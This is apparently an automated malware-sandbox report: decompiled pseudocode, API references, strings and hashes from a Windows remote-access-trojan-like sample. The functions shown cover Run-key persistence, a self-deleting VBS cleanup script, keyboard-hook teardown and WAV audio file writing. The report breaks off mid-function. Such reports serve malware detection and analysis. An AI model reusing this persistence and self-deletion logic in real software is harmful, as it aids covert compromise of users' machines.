                                                                                                • API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
                                                                                                • String ID: .exe$Mutex_RemWatchdog$WDH$exepath$hpg$open$temp_
                                                                                                • API String ID: 2645874385-2295662049
                                                                                                • Opcode ID: 2e89c464562e4461e14d798b06b8937e2a5012541605e944512462fcc914ab84
                                                                                                • Instruction ID: 8fb13afc9366eaa05f155c0dfa1e6065d0e9df949325238f3e65443df0059d17
                                                                                                • Opcode Fuzzy Hash: 2e89c464562e4461e14d798b06b8937e2a5012541605e944512462fcc914ab84
                                                                                                • Instruction Fuzzy Hash: E451D871A0031A6BDB10B7B09C49EEE336C9B4571DF24017BB901A71D2EF789D858BA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 98%
                                                                                                			E0040ADA8() {
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				char _v76;
                                                                                                				char _v100;
                                                                                                				char _v124;
                                                                                                				char _v148;
                                                                                                				short _v668;
                                                                                                				void* _t49;
                                                                                                				void* _t50;
                                                                                                				void* _t53;
                                                                                                				void* _t56;
                                                                                                				void* _t82;
                                                                                                				void* _t84;
                                                                                                				void* _t85;
                                                                                                				signed char _t123;
                                                                                                				signed char _t124;
                                                                                                				void* _t227;
                                                                                                				void* _t229;
                                                                                                				void* _t230;
                                                                                                				void* _t231;
                                                                                                
                                                                                                				E00410199();
                                                                                                				if( *0x46c9c4 != 0x30) {
                                                                                                					E00409DA8();
                                                                                                				}
                                                                                                				_t227 =  *0x46dd5f - 1; // 0x0
                                                                                                				if(_t227 == 0) {
                                                                                                					E00415D62(_t227);
                                                                                                				}
                                                                                                				if( *0x46da75 != 0) {
                                                                                                					E00418144(E00401EDD(0x46e0d4));
                                                                                                				}
                                                                                                				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                                                                                				_t229 =  *0x46daf6 - 1; // 0x1
                                                                                                				if(_t229 == 0) {
                                                                                                					E00410D8B(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EDD(0x46e578));
                                                                                                				}
                                                                                                				_t230 =  *0x46daef - 1; // 0x0
                                                                                                				if(_t230 == 0) {
                                                                                                					E00410D8B(0x80000002, _t214, E00401EDD(0x46e578));
                                                                                                				}
                                                                                                				_t231 =  *0x46daf4 - 1; // 0x0
                                                                                                				if(_t231 == 0) {
                                                                                                					E00410D8B(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EDD(0x46e578));
                                                                                                				}
                                                                                                				E00432D80(0,  &_v668, 0, 0x208);
                                                                                                				_t49 = E0040247B();
                                                                                                				_t50 = E00401F87(0x46e5f0);
                                                                                                				_t53 = E00410A5F(E00401F87(0x46e5a8), "exepath",  &_v668, 0x208, _t50, _t49);
                                                                                                				_t232 = _t53;
                                                                                                				if(_t53 == 0) {
                                                                                                					GetModuleFileNameW(0,  &_v668, 0x208);
                                                                                                				}
                                                                                                				RegDeleteKeyA(0x80000001, E00401F87(0x46e5a8));
                                                                                                				_t56 = E00407647(_t232);
                                                                                                				_t233 = _t56;
                                                                                                				if(_t56 != 0) {
                                                                                                					SetFileAttributesW(E00401EDD(0x46e5c0), 0x80);
                                                                                                				}
                                                                                                				_t123 =  ~(SetFileAttributesW( &_v668, 0x80));
                                                                                                				asm("sbb bl, bl");
                                                                                                				E00403098(_t123,  &_v148, E00417CCA( &_v76, E00417A83( &_v28)), 0, _t233, L".vbs");
                                                                                                				E00401EE2();
                                                                                                				E00401FB9();
                                                                                                				E0040440A(_t123,  &_v124, E00403098(_t123,  &_v28, E00404260(_t123,  &_v76, E00437AEF(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E004043E6(_t123,  &_v52, L"On Error Resume Next\n", _t233, E00404260(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
                                                                                                				E00401EE2();
                                                                                                				_t124 = _t123 & 0x00000001;
                                                                                                				_t234 = _t124;
                                                                                                				if(_t124 != 0) {
                                                                                                					E00403303(E00403098(_t124,  &_v28, E004043E6(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E00404260(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                				}
                                                                                                				E00403303(E00403098(_t124,  &_v100, E00403098(_t124,  &_v28, E00404260(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				_t235 = _t124;
                                                                                                				if(_t124 != 0) {
                                                                                                					E0040778C(_t124,  &_v52, 0, L"wend\n");
                                                                                                				}
                                                                                                				_t82 = E00407647(_t235);
                                                                                                				_t236 = _t82;
                                                                                                				if(_t82 != 0) {
                                                                                                					E00403303(E00403098(0x46079c,  &_v100, E00409E9E( &_v28, L"fso.DeleteFolder \"", _t236, 0x46e5c0), 0, _t236, L"\"\n"));
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                				}
                                                                                                				E0040778C(0x46079c,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                                                                                                				_t84 = E00401EDD( &_v124);
                                                                                                				_t85 = E0040247B();
                                                                                                				if(E00418337(E00401EDD( &_v52), _t85 + _t85, _t84, 0) != 0) {
                                                                                                					ShellExecuteW(0, L"open", E00401EDD( &_v124), 0x46079c, 0x46079c, 0);
                                                                                                				}
                                                                                                				ExitProcess(0);
                                                                                                			}

                                                                                                APIs
                                                                                                  • Part of subcall function 00410199: TerminateProcess.KERNEL32(00000000,?,0040ADB9), ref: 004101A9
                                                                                                  • Part of subcall function 00410199: WaitForSingleObject.KERNEL32(000000FF,?,0040ADB9), ref: 004101BC
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040AEB2
                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040AEC5
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040AEF3
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040AF01
                                                                                                  • Part of subcall function 00409DA8: TerminateThread.KERNEL32(00408881,00000000,?,0040ADC7), ref: 00409DB7
                                                                                                  • Part of subcall function 00409DA8: UnhookWindowsHookEx.USER32(00000000), ref: 00409DC7
                                                                                                  • Part of subcall function 00409DA8: TerminateThread.KERNEL32(Function_00008866,00000000,?,0040ADC7), ref: 00409DD9
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,0046079C,0046079C,00000000), ref: 0040B0F8
                                                                                                • ExitProcess.KERNEL32 ref: 0040B0FF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                • String ID: ")$.vbs$0f$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("$x(f
                                                                                                • API String ID: 3659626935-1979138167
                                                                                                • Opcode ID: 5913b6c86f9592883f5985328183df623a6b08be90e15b5d4b3f0ae7e31f2d3f
                                                                                                • Instruction ID: bb67d2f1cc060f5b836f34edc1f555fa46a9c6b40fbef6dea4b6e95154a67b63
                                                                                                • Opcode Fuzzy Hash: 5913b6c86f9592883f5985328183df623a6b08be90e15b5d4b3f0ae7e31f2d3f
                                                                                                • Instruction Fuzzy Hash: 9A81A171A001186ACB14FBA2DCA69EF77699F50308F14007FF506B71E2EE7C5D8A869D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E00401A56(WCHAR* __ecx, signed int __edx) {
                                                                                                				long _v8;
                                                                                                				void _v12;
                                                                                                				void _v16;
                                                                                                				void _v20;
                                                                                                				void _v24;
                                                                                                				void _v28;
                                                                                                				void _v32;
                                                                                                				signed int _t36;
                                                                                                				void** _t75;
                                                                                                				signed int _t80;
                                                                                                				void* _t81;
                                                                                                				signed int _t83;
                                                                                                
                                                                                                				_t75 = __edx;
                                                                                                				_t80 =  *0x46da9a & 0x0000ffff;
                                                                                                				_t83 = ( *0x46daa6 & 0x0000ffff) * _t80;
                                                                                                				_v20 = 1;
                                                                                                				_v16 = 0x10;
                                                                                                				_v24 = _t83 *  *0x46da9c >> 3;
                                                                                                				asm("cdq");
                                                                                                				_v28 = _t83 + (__edx & 0x00000007) >> 3;
                                                                                                				_t36 =  *(__edx + 4) * _t80;
                                                                                                				_v32 = _t36;
                                                                                                				_v12 = _t36 + 0x24;
                                                                                                				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                				if(_t81 != 0xffffffff) {
                                                                                                					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
                                                                                                					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
                                                                                                					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
                                                                                                					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
                                                                                                					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
                                                                                                					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
                                                                                                					WriteFile(_t81, 0x46da9a, 2,  &_v8, 0);
                                                                                                					WriteFile(_t81, 0x46da9c, 4,  &_v8, 0);
                                                                                                					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
                                                                                                					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
                                                                                                					WriteFile(_t81, 0x46daa6, 2,  &_v8, 0);
                                                                                                					WriteFile(_t81, "data", 4,  &_v8, 0);
                                                                                                					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
                                                                                                					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
                                                                                                					CloseHandle(_t81);
                                                                                                					return 1;
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}

                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401ABE
                                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AE5
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AF4
                                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B04
                                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B14
                                                                                                • WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B23
                                                                                                • WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B32
                                                                                                • WriteFile.KERNEL32(00000000,0046DA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B42
                                                                                                • WriteFile.KERNEL32(00000000,0046DA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B52
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B61
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B70
                                                                                                • WriteFile.KERNEL32(00000000,0046DAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B80
                                                                                                • WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B90
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B9F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: File$Write$Create
                                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                                • API String ID: 1602526932-4212202414
                                                                                                • Opcode ID: 16c098fd1daa7608eb1fce459ed88d74f7109c1c7fae6d4cba85baecba85c95a
                                                                                                • Instruction ID: a9c16d0427254a6df8bd8019202ff59db17a4ff3cc7d834d63ff0d13a2e39a0e
                                                                                                • Opcode Fuzzy Hash: 16c098fd1daa7608eb1fce459ed88d74f7109c1c7fae6d4cba85baecba85c95a
                                                                                                • Instruction Fuzzy Hash: 84410CB5E50218BAE710DA918C86FFFBBBCDB45B10F504056F704EA1C0E7B49A05DBA6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 87%
                                                                                                			E004488FD(signed int _a4, signed int _a8) {
                                                                                                				signed int _v0;
                                                                                                				signed char _v5;
                                                                                                				intOrPtr _v8;
                                                                                                				signed char _v9;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				signed int _v44;
                                                                                                				signed int _v92;
                                                                                                				signed int _v128;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t116;
                                                                                                				signed int _t119;
                                                                                                				signed int _t120;
                                                                                                				signed int _t122;
                                                                                                				signed int _t123;
                                                                                                				signed int _t126;
                                                                                                				signed int _t127;
                                                                                                				signed int _t131;
                                                                                                				signed int _t133;
                                                                                                				signed int _t136;
                                                                                                				signed int _t138;
                                                                                                				signed int _t139;
                                                                                                				signed int _t142;
                                                                                                				void* _t143;
                                                                                                				signed int _t148;
                                                                                                				signed int* _t150;
                                                                                                				signed int* _t156;
                                                                                                				signed int _t163;
                                                                                                				signed int _t165;
                                                                                                				signed int _t167;
                                                                                                				intOrPtr _t168;
                                                                                                				signed int _t173;
                                                                                                				signed int _t175;
                                                                                                				signed int _t176;
                                                                                                				signed int _t180;
                                                                                                				signed int _t185;
                                                                                                				intOrPtr* _t186;
                                                                                                				signed int _t191;
                                                                                                				signed int _t196;
                                                                                                				signed int _t197;
                                                                                                				signed int _t204;
                                                                                                				intOrPtr* _t205;
                                                                                                				signed int _t214;
                                                                                                				signed int _t215;
                                                                                                				signed int _t217;
                                                                                                				signed int _t218;
                                                                                                				signed int _t220;
                                                                                                				signed int _t221;
                                                                                                				signed int _t223;
                                                                                                				intOrPtr _t225;
                                                                                                				void* _t231;
                                                                                                				signed int _t233;
                                                                                                				void* _t236;
                                                                                                				signed int _t237;
                                                                                                				signed int _t238;
                                                                                                				void* _t241;
                                                                                                				signed int _t244;
                                                                                                				signed int _t246;
                                                                                                				void* _t252;
                                                                                                				signed int _t253;
                                                                                                				signed int _t254;
                                                                                                				void* _t260;
                                                                                                				void* _t262;
                                                                                                				signed int _t263;
                                                                                                				intOrPtr* _t267;
                                                                                                				intOrPtr* _t271;
                                                                                                				signed int _t274;
                                                                                                				signed int _t276;
                                                                                                				signed int _t280;
                                                                                                				signed int _t282;
                                                                                                				void* _t283;
                                                                                                				void* _t284;
                                                                                                				void* _t285;
                                                                                                				signed int _t286;
                                                                                                				signed int _t288;
                                                                                                				signed int _t290;
                                                                                                				signed int _t291;
                                                                                                				signed int* _t292;
                                                                                                				signed int _t298;
                                                                                                				signed int _t299;
                                                                                                				CHAR* _t300;
                                                                                                				signed int _t302;
                                                                                                				signed int _t303;
                                                                                                				WCHAR* _t304;
                                                                                                				signed int _t305;
                                                                                                				signed int _t306;
                                                                                                				signed int* _t307;
                                                                                                				signed int _t308;
                                                                                                				signed int _t310;
                                                                                                				void* _t316;
                                                                                                				void* _t317;
                                                                                                				void* _t318;
                                                                                                				void* _t320;
                                                                                                				void* _t321;
                                                                                                				void* _t322;
                                                                                                				void* _t323;
                                                                                                
                                                                                                				_t217 = _a4;
                                                                                                				if(_t217 != 0) {
                                                                                                					_t286 = _t217;
                                                                                                					_t116 = E00432530(_t217, 0x3d);
                                                                                                					_v16 = _t116;
                                                                                                					_t231 = _t285;
                                                                                                					__eflags = _t116;
                                                                                                					if(_t116 == 0) {
                                                                                                						L10:
                                                                                                						 *((intOrPtr*)(E00438932())) = 0x16;
                                                                                                						goto L11;
                                                                                                					} else {
                                                                                                						__eflags = _t116 - _t217;
                                                                                                						if(_t116 == _t217) {
                                                                                                							goto L10;
                                                                                                						} else {
                                                                                                							__eflags =  *((char*)(_t116 + 1));
                                                                                                							_t298 =  *0x46d4d0; // 0x65eb40
                                                                                                							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
                                                                                                							_v5 = _t120;
                                                                                                							__eflags = _t298 -  *0x46d4dc; // 0x65eb40
                                                                                                							if(__eflags == 0) {
                                                                                                								L87();
                                                                                                								_t298 = _t120;
                                                                                                								_t120 = _v5;
                                                                                                								_t231 = _t298;
                                                                                                								 *0x46d4d0 = _t298;
                                                                                                							}
                                                                                                							_t218 = 0;
                                                                                                							__eflags = _t298;
                                                                                                							if(_t298 != 0) {
                                                                                                								L21:
                                                                                                								_t233 = _t286;
                                                                                                								_t122 = _v16 - _t233;
                                                                                                								_push(_t122);
                                                                                                								_push(_t233);
                                                                                                								L121();
                                                                                                								_v12 = _t122;
                                                                                                								__eflags = _t122;
                                                                                                								if(_t122 < 0) {
                                                                                                									L29:
                                                                                                									__eflags = _v5 - _t218;
                                                                                                									if(_v5 != _t218) {
                                                                                                										goto L12;
                                                                                                									} else {
                                                                                                										_t123 =  ~_t122;
                                                                                                										_v12 = _t123;
                                                                                                										_t27 = _t123 + 2; // 0x2
                                                                                                										_t236 = _t27;
                                                                                                										__eflags = _t236 - _t123;
                                                                                                										if(_t236 < _t123) {
                                                                                                											goto L11;
                                                                                                										} else {
                                                                                                											__eflags = _t236 - 0x3fffffff;
                                                                                                											if(_t236 >= 0x3fffffff) {
                                                                                                												goto L11;
                                                                                                											} else {
                                                                                                												_push(4);
                                                                                                												_push(_t236);
                                                                                                												_t299 = E00448FA5(_t298);
                                                                                                												E004414D5(_t218);
                                                                                                												_t320 = _t320 + 0x10;
                                                                                                												__eflags = _t299;
                                                                                                												if(_t299 == 0) {
                                                                                                													goto L11;
                                                                                                												} else {
                                                                                                													_t237 = _v12;
                                                                                                													_t286 = _t218;
                                                                                                													_t126 = _a4;
                                                                                                													 *(_t299 + _t237 * 4) = _t126;
                                                                                                													 *(_t299 + 4 + _t237 * 4) = _t218;
                                                                                                													goto L34;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								} else {
                                                                                                									__eflags =  *_t298 - _t218;
                                                                                                									if( *_t298 == _t218) {
                                                                                                										goto L29;
                                                                                                									} else {
                                                                                                										E004414D5( *((intOrPtr*)(_t298 + _t122 * 4)));
                                                                                                										_t282 = _v12;
                                                                                                										__eflags = _v5 - _t218;
                                                                                                										if(_v5 != _t218) {
                                                                                                											while(1) {
                                                                                                												__eflags =  *(_t298 + _t282 * 4) - _t218;
                                                                                                												if( *(_t298 + _t282 * 4) == _t218) {
                                                                                                													break;
                                                                                                												}
                                                                                                												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
                                                                                                												_t282 = _t282 + 1;
                                                                                                												__eflags = _t282;
                                                                                                											}
                                                                                                											_push(4);
                                                                                                											_push(_t282);
                                                                                                											_t299 = E00448FA5(_t298);
                                                                                                											E004414D5(_t218);
                                                                                                											_t320 = _t320 + 0x10;
                                                                                                											_t126 = _t286;
                                                                                                											__eflags = _t299;
                                                                                                											if(_t299 != 0) {
                                                                                                												L34:
                                                                                                												 *0x46d4d0 = _t299;
                                                                                                											}
                                                                                                										} else {
                                                                                                											_t126 = _a4;
                                                                                                											_t286 = _t218;
                                                                                                											 *(_t298 + _t282 * 4) = _t126;
                                                                                                										}
                                                                                                										__eflags = _a8 - _t218;
                                                                                                										if(_a8 == _t218) {
                                                                                                											goto L12;
                                                                                                										} else {
                                                                                                											_t238 = _t126;
                                                                                                											_t283 = _t238 + 1;
                                                                                                											do {
                                                                                                												_t127 =  *_t238;
                                                                                                												_t238 = _t238 + 1;
                                                                                                												__eflags = _t127;
                                                                                                											} while (_t127 != 0);
                                                                                                											_v12 = _t238 - _t283 + 2;
                                                                                                											_t300 = E00440628(_t238 - _t283, _t238 - _t283 + 2, 1);
                                                                                                											_pop(_t241);
                                                                                                											__eflags = _t300;
                                                                                                											if(_t300 == 0) {
                                                                                                												L42:
                                                                                                												E004414D5(_t300);
                                                                                                												goto L12;
                                                                                                											} else {
                                                                                                												_t131 = E0043CAAC(_t300, _v12, _a4);
                                                                                                												_t321 = _t320 + 0xc;
                                                                                                												__eflags = _t131;
                                                                                                												if(_t131 != 0) {
                                                                                                													_push(_t218);
                                                                                                													_push(_t218);
                                                                                                													_push(_t218);
                                                                                                													_push(_t218);
                                                                                                													_push(_t218);
                                                                                                													E00437736();
                                                                                                													asm("int3");
                                                                                                													_t316 = _t321;
                                                                                                													_t322 = _t321 - 0xc;
                                                                                                													_push(_t218);
                                                                                                													_t220 = _v44;
                                                                                                													__eflags = _t220;
                                                                                                													if(_t220 != 0) {
                                                                                                														_push(_t300);
                                                                                                														_push(_t286);
                                                                                                														_push(0x3d);
                                                                                                														_t288 = _t220;
                                                                                                														_t133 = E00452197(_t241);
                                                                                                														_v20 = _t133;
                                                                                                														_t244 = _t220;
                                                                                                														__eflags = _t133;
                                                                                                														if(_t133 == 0) {
                                                                                                															L54:
                                                                                                															 *((intOrPtr*)(E00438932())) = 0x16;
                                                                                                															goto L55;
                                                                                                														} else {
                                                                                                															__eflags = _t133 - _t220;
                                                                                                															if(_t133 == _t220) {
                                                                                                																goto L54;
                                                                                                															} else {
                                                                                                																_t302 =  *0x46d4d4; // 0x676fa0
                                                                                                																_t221 = 0;
                                                                                                																__eflags =  *(_t133 + 2);
                                                                                                																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
                                                                                                																_v9 = _t246;
                                                                                                																__eflags = _t302 -  *0x46d4d8; // 0x65ee58
                                                                                                																if(__eflags == 0) {
                                                                                                																	_push(_t302);
                                                                                                																	L104();
                                                                                                																	_t246 = _v9;
                                                                                                																	_t302 = _t133;
                                                                                                																	 *0x46d4d4 = _t302;
                                                                                                																}
                                                                                                																__eflags = _t302;
                                                                                                																if(_t302 != 0) {
                                                                                                																	L64:
                                                                                                																	_v20 = _v20 - _t288 >> 1;
                                                                                                																	_t138 = E00448F38(_t288, _v20 - _t288 >> 1);
                                                                                                																	_v16 = _t138;
                                                                                                																	__eflags = _t138;
                                                                                                																	if(_t138 < 0) {
                                                                                                																		L72:
                                                                                                																		__eflags = _v9 - _t221;
                                                                                                																		if(_v9 != _t221) {
                                                                                                																			goto L56;
                                                                                                																		} else {
                                                                                                																			_t139 =  ~_t138;
                                                                                                																			_v16 = _t139;
                                                                                                																			_t72 = _t139 + 2; // 0x2
                                                                                                																			_t252 = _t72;
                                                                                                																			__eflags = _t252 - _t139;
                                                                                                																			if(_t252 < _t139) {
                                                                                                																				goto L55;
                                                                                                																			} else {
                                                                                                																				__eflags = _t252 - 0x3fffffff;
                                                                                                																				if(_t252 >= 0x3fffffff) {
                                                                                                																					goto L55;
                                                                                                																				} else {
                                                                                                																					_push(4);
                                                                                                																					_push(_t252);
                                                                                                																					_t303 = E00448FA5(_t302);
                                                                                                																					E004414D5(_t221);
                                                                                                																					_t322 = _t322 + 0x10;
                                                                                                																					__eflags = _t303;
                                                                                                																					if(_t303 == 0) {
                                                                                                																						goto L55;
                                                                                                																					} else {
                                                                                                																						_t253 = _v16;
                                                                                                																						_t288 = _t221;
                                                                                                																						_t142 = _v0;
                                                                                                																						 *(_t303 + _t253 * 4) = _t142;
                                                                                                																						 *(_t303 + 4 + _t253 * 4) = _t221;
                                                                                                																						goto L77;
                                                                                                																					}
                                                                                                																				}
                                                                                                																			}
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		__eflags =  *_t302 - _t221;
                                                                                                																		if( *_t302 == _t221) {
                                                                                                																			goto L72;
                                                                                                																		} else {
                                                                                                																			E004414D5( *((intOrPtr*)(_t302 + _t138 * 4)));
                                                                                                																			_t276 = _v16;
                                                                                                																			__eflags = _v9 - _t221;
                                                                                                																			if(_v9 != _t221) {
                                                                                                																				while(1) {
                                                                                                																					__eflags =  *(_t302 + _t276 * 4) - _t221;
                                                                                                																					if( *(_t302 + _t276 * 4) == _t221) {
                                                                                                																						break;
                                                                                                																					}
                                                                                                																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
                                                                                                																					_t276 = _t276 + 1;
                                                                                                																					__eflags = _t276;
                                                                                                																				}
                                                                                                																				_push(4);
                                                                                                																				_push(_t276);
                                                                                                																				_t303 = E00448FA5(_t302);
                                                                                                																				E004414D5(_t221);
                                                                                                																				_t322 = _t322 + 0x10;
                                                                                                																				_t142 = _t288;
                                                                                                																				__eflags = _t303;
                                                                                                																				if(_t303 != 0) {
                                                                                                																					L77:
                                                                                                																					 *0x46d4d4 = _t303;
                                                                                                																				}
                                                                                                																			} else {
                                                                                                																				_t142 = _v0;
                                                                                                																				_t288 = _t221;
                                                                                                																				 *(_t302 + _t276 * 4) = _t142;
                                                                                                																			}
                                                                                                																			__eflags = _a4 - _t221;
                                                                                                																			if(_a4 == _t221) {
                                                                                                																				goto L56;
                                                                                                																			} else {
                                                                                                																				_t254 = _t142;
                                                                                                																				_t81 = _t254 + 2; // 0x2
                                                                                                																				_t284 = _t81;
                                                                                                																				do {
                                                                                                																					_t143 =  *_t254;
                                                                                                																					_t254 = _t254 + 2;
                                                                                                																					__eflags = _t143 - _t221;
                                                                                                																				} while (_t143 != _t221);
                                                                                                																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
                                                                                                																				_v16 = _t82;
                                                                                                																				_t304 = E00440628(_t254 - _t284 >> 1, _t82, 2);
                                                                                                																				_pop(_t258);
                                                                                                																				__eflags = _t304;
                                                                                                																				if(_t304 == 0) {
                                                                                                																					L85:
                                                                                                																					E004414D5(_t304);
                                                                                                																					goto L56;
                                                                                                																				} else {
                                                                                                																					_t148 = E004428B4(_t304, _v16, _v0);
                                                                                                																					_t323 = _t322 + 0xc;
                                                                                                																					__eflags = _t148;
                                                                                                																					if(_t148 != 0) {
                                                                                                																						_push(_t221);
                                                                                                																						_push(_t221);
                                                                                                																						_push(_t221);
                                                                                                																						_push(_t221);
                                                                                                																						_push(_t221);
                                                                                                																						E00437736();
                                                                                                																						asm("int3");
                                                                                                																						_push(_t316);
                                                                                                																						_t317 = _t323;
                                                                                                																						_push(_t288);
                                                                                                																						_t290 = _v92;
                                                                                                																						__eflags = _t290;
                                                                                                																						if(_t290 != 0) {
                                                                                                																							_t260 = 0;
                                                                                                																							_t150 = _t290;
                                                                                                																							__eflags =  *_t290;
                                                                                                																							if( *_t290 != 0) {
                                                                                                																								do {
                                                                                                																									_t150 =  &(_t150[1]);
                                                                                                																									_t260 = _t260 + 1;
                                                                                                																									__eflags =  *_t150;
                                                                                                																								} while ( *_t150 != 0);
                                                                                                																							}
                                                                                                																							_t93 = _t260 + 1; // 0x2
                                                                                                																							_t305 = E00440628(_t260, _t93, 4);
                                                                                                																							_t262 = _t304;
                                                                                                																							__eflags = _t305;
                                                                                                																							if(_t305 == 0) {
                                                                                                																								L102:
                                                                                                																								E00440C29(_t221, _t284, _t290, _t305);
                                                                                                																								goto L103;
                                                                                                																							} else {
                                                                                                																								__eflags =  *_t290;
                                                                                                																								if( *_t290 == 0) {
                                                                                                																									L100:
                                                                                                																									E004414D5(0);
                                                                                                																									_t175 = _t305;
                                                                                                																									goto L101;
                                                                                                																								} else {
                                                                                                																									_push(_t221);
                                                                                                																									_t221 = _t305 - _t290;
                                                                                                																									__eflags = _t221;
                                                                                                																									do {
                                                                                                																										_t271 =  *_t290;
                                                                                                																										_t94 = _t271 + 1; // 0x5
                                                                                                																										_t284 = _t94;
                                                                                                																										do {
                                                                                                																											_t176 =  *_t271;
                                                                                                																											_t271 = _t271 + 1;
                                                                                                																											__eflags = _t176;
                                                                                                																										} while (_t176 != 0);
                                                                                                																										_t262 = _t271 - _t284;
                                                                                                																										_t95 = _t262 + 1; // 0x6
                                                                                                																										_v16 = _t95;
